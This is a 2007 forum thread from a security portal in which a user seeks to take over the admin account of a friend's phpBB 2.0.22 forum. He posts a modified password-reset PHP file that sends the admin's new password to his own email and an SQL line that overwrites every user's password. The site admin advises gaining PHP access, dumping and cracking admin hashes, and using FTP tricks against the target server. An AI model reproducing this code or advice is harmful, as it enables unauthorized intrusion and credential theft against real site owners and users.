Waraxe IT Security Portal
Login or Register
November 23, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 120
Members: 0
Total: 120
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to obtain MD5 hashes on phpbb 2.0.22? Goto page 1, 2Next
Post new topicReply to topic View previous topic :: View next topic
How to obtain MD5 hashes on phpbb 2.0.22?
PostPosted: Fri Dec 21, 2007 1:19 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




I can do the rest myself easily enough. The site has html disabled, only standard bbcode, and (for now) the docs directory is still there, unprotected. Here is a full path disclosure of the site.

/home/exosyph/public_html/addon-domain-exosyphenstudios-com/site-forum/profile.php

Any help would be GREATLY appreciated. I know the admin of the site personally and I don't want the hash to get revenge or anything like that, simply to convince him to upgrade to something more secure or at least change his board config.
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 1:37 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




phpbb 2.0.22 happens to be the latest versions of 2.x branch. So there is no known security issues as for today - correct me, if i'm wrong.
Your choices are:

1. possible vulnerable MOD-s in target phpbb installation
2. colocated websites on same webserver
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 1:50 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




Thanks for the reply, and as far as I know he doesn't have any MODs installed, and most of the non-standard features he made himself. He's a game programmer and a wiz at C++ and I'm guessing he knows php at least casually. I have a few ideas of exploits but no sure way to implement them. One idea I had was: he has a web server and it seems that anonymous users can upload files (may be mistaken, I haven't tried). I thought that if I could mod the files that resend passwords (already done this on my own site, converted the "generate new pass" to a "recover my pass" feature. Safe enough because I'm the only admin) and upload them to the server then just access them from firefox, reset the password, and have it sent to me instead of his email. This is not easy for me though since I'm a novice (at best) concerning php. I'm not sure about other websites linked to his, and my other idea (only other one that may work) is since the doc directory is still open to possibly access that, change some files to php to send me the password, then access them.
Here's all I have so far, which is the modded usercp_sendpasswd.php file
Code:
<?php
/***************************************************************************
* usercp_sendpasswd.php
* -------------------
* begin : Saturday, Feb 13, 2001
* copyright : (C) 2001 The phpBB Group
* email : support@phpbb.com
*
* $Id: usercp_sendpasswd.php,v 1.6.2.13 2005/09/14 18:14:30 acydburn Exp $
*
*
***************************************************************************/

/***************************************************************************
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
*
***************************************************************************/
if ( isset($HTTP_POST_VARS['submit']) )
{
$username = ( !empty($HTTP_POST_VARS['username']) ) ?

phpbb_clean_username($HTTP_POST_VARS['username']) : '';
$email = ( !empty($HTTP_POST_VARS['email']) ) ?

trim(strip_tags(htmlspecialchars($HTTP_POST_VARS['email']))) : '';

$sql = "SELECT user_id, username, user_email, user_active, user_lang, pw_backup
FROM " . USERS_TABLE . "
WHERE user_id = 2";
if ( $result = $db->sql_query($sql) )
{
if ( $row = $db->sql_fetchrow($result) )
{
if ( !$row['user_active'] )
{
message_die(GENERAL_MESSAGE,

$lang['No_send_account_inactive']);
}

$username = $row['username'];
$user_id = $row['user_id'];

$user_actkey = gen_rand_string(true);
$key_len = 54 - strlen($server_url);
$key_len = ($key_len > 6) ? $key_len : 6;
$user_actkey = substr($user_actkey, 0, $key_len);
$user_password = gen_rand_string(false);

$sql = "UPDATE " . USERS_TABLE . "
SET user_newpasswd = '" . md5($user_password) . "',

user_actkey = '$user_actkey'
WHERE user_id = " . $row['user_id'];
if ( !$db->sql_query($sql) )
{
message_die(GENERAL_ERROR, 'Could not update new password

information', '', __LINE__, __FILE__, $sql);
}

include($phpbb_root_path . 'includes/emailer.'.$phpEx);
$emailer = new emailer($board_config['smtp_delivery']);

$emailer->from($board_config['board_email']);
$emailer->replyto($board_config['board_email']);

$emailer->use_template('user_activate_passwd', $row['user_lang']);
$emailer->email_address("myemail@.com";
$emailer->set_subject($lang['New_password_activation']);

$emailer->assign_vars(array(
'SITENAME' => $board_config['sitename'],
'USERNAME' => $username,
'PASSWORD' => $user_password,
'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ?

str_replace('<br />', "\n", "-- \n" . $board_config['board_email_sig']) : '',

'U_ACTIVATE' => $server_url . '?mode=activate&' .

POST_USERS_URL . '=' . $user_id . '&act_key=' . $user_actkey)
);
$emailer->send();
$emailer->reset();

$template->assign_vars(array(
'META' => '<meta http-equiv="refresh" content="15;url=' .

append_sid("index.$phpEx") . '">')
);

$message = $lang['Password_updated'] . '<br /><br />' .

sprintf($lang['Click_return_index'], '<a href="' . append_sid("index.$phpEx") . '">',

'</a>');

message_die(GENERAL_MESSAGE, $message);
}
else
{
message_die(GENERAL_MESSAGE, $lang['No_email_match']);
}
}
else
{
message_die(GENERAL_ERROR, 'Could not obtain user information for

sendpassword', '', __LINE__, __FILE__, $sql);
}
}
else
{
$username = '';
$email = '';
}

//
// Output basic page
//
include($phpbb_root_path . 'includes/page_header.'.$phpEx);

$template->set_filenames(array(
'body' => 'profile_send_pass.tpl')
);
make_jumpbox('viewforum.'.$phpEx);

$template->assign_vars(array(
'USERNAME' => $username,
'EMAIL' => $email,

'L_SEND_PASSWORD' => $lang['Send_password'],
'L_ITEMS_REQUIRED' => $lang['Items_required'],
'L_EMAIL_ADDRESS' => $lang['Email_address'],
'L_SUBMIT' => $lang['Submit'],
'L_RESET' => $lang['Reset'],

'S_HIDDEN_FIELDS' => '',
'S_PROFILE_ACTION' => append_sid("profile.$phpEx?mode=sendpassword"))
);

$template->pparse('body');

include($phpbb_root_path . 'includes/page_tail.'.$phpEx);

?>
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 1:55 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You can upload and/or manipulate php files on target server? So what's the problem? You can do whatever you want then. With few php lines fetch the needed data from database or modify data directly. Php scripting level access is considered higher level than phpbb admin.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:01 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




Like I said these are just theories...ideas. I THINKI can upload. I don't know for sure. You also have to remember I don't know a lot of php. I don't know the lines. The best I could do would be
Code:
$pass = md5("w/e pass i want"); $sql = "UPDATE" . USERS_TABLE . " SET user_password = $pass";
This may or may not work, and like I said it's just to prove a point, not get revenge. Even if the anonymous FTP user CAN upload I have no idea WHERE the files would be. All of this is sheer theory.
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 2:05 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Then first try to prove your theory and get access to php level. And then just write little php code which will fetch all users (or only admins) from database and write data to some file or just echo it back. And then try to crack md5 hashes you fetched.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:15 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




Well honestly I'm new to this. I'm a white-hat script kiddie (at best) so right now I need as much help as I can get. I know the sql (more or less) to fetch the password of a specified user, which is what I want. I just can't think of anything that submits and sql query with variables I can exploit. Honestly I don't think it has to be ME doing this, just anyone who can. Proof of concept doesn't care who creates it. I'll admit I'm a computer programmer but the languages I know well enough to use are either outdated (like VB6) or are disabled (like html). I'm also willing to admit I'm not a "master" of any language in the sense I don't know any language fully. I know enough to get by. I have NO skill with FTP since I've never used it before and thus I can't test any of these ideas. I do know that when I login with the anonymous account I do this:
ls
200 PORT command successful
after that it usually gives me a time-out message. When I logout it says
goodbye anonymous. You have uploaded 0 bytes and have downloaded 0 bytes. That is what gave me the impression the anonymous user could upload.
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 2:24 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you can log in as anonymous but after ls command get timeout, then it seems to be firewall problem. From internet:

Code:

Common Firewall

* I can connect to the FTP server. The connection hangs after the ls, dir, put or get command.
o Use passive FTP. This is done with the "passive" command for most command line clients. If your client does not offer the passive command it will use active FTP properly.



So try to use passive mode. And "ls -la" is better choice - you can see dir and file permissions.


Last edited by waraxe on Fri Dec 21, 2007 2:27 pm; edited 1 time in total
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:26 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




I'm using the built in (sucky,yes I know) windows ftp client, the one from cmd so I guess I can't use passive mode. I'll try allowing it in my firewall. Also thanks for the info about "ls -la"
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 2:29 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Once you have connected, then logged in use the following command from the Windows FTP command line client:

LITERAL PASV

You should see then "Entering Passive Mode" Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:35 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




Oh, thank you very much. I told you I'd never done FTP before and I suppose that proved it Razz. I'm only 19 so I deserve a break (not really but it's fun to say). Here's the output I got.

220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 8 of 50 allowed.
220-Local time is now 08:31. Server port: 21.
220 You will be disconnected after 15 minutes of inactivity.
User (*********.com:(none)):
230 Anonymous user logged in
ftp> LITERAL PASV
227 Entering Passive Mode (**,**,**,**,147,133)
ftp> ls -la
200 PORT command successful
425 Could not open data connection to port 50016: Connection timed out
ftp>

It can't be my firewall because it was turned completely off this time.

Also this may help:

214-The following SITE commands are recognized
ALIAS
CHMOD
IDLE
UTIME
214 Pure-FTPd - http://pureftpd.org/
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 2:43 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




If you have no firewall between you and ftp server, then ls command must work without PASSIVE mode, and PASSIVE should work too. How you are connected to internet? From home, DSL? Maybe your ISP has firewall restrictions. Try some other anonymous ftp servers, like ftp.microsoft.com - do they work? Without PASV?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:45 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




I have Charter, so I have a cable modem. I was able to enter passive mode but not much of anything else. If you look at my previous post you'll see the available commands for anonymous users. I may have posted after you started typing your response.
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Fri Dec 21, 2007 2:46 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Still - try other ftp servers in order to determine, that is it common problem or related only to specific ftp server.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Dec 21, 2007 2:49 pm Reply with quote
dbzfanatic_1
Regular user
Regular user
Joined: May 22, 2007
Posts: 12




This is the output I got from my own website's FTP server. No I don't generally connect I just store files there for my members to download.

220 Welcome to the New Chaos Programming FTP Server
User (****:(none)):
501 Syntax error
Login failed.
ftp> user anonymous
331 Password required for anonymous
Password:
230 Logged on
ftp> ls
200 Port command successful
150 Opening data channel for directory list.
incoming
onefile.html
226 Transfer OK
ftp: 24 bytes received in 0.00Seconds 24000.00Kbytes/sec.
ftp>
View user's profile Send private message Visit poster's website Yahoo Messenger
How to obtain MD5 hashes on phpbb 2.0.22?
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 2
Goto page 1, 2Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds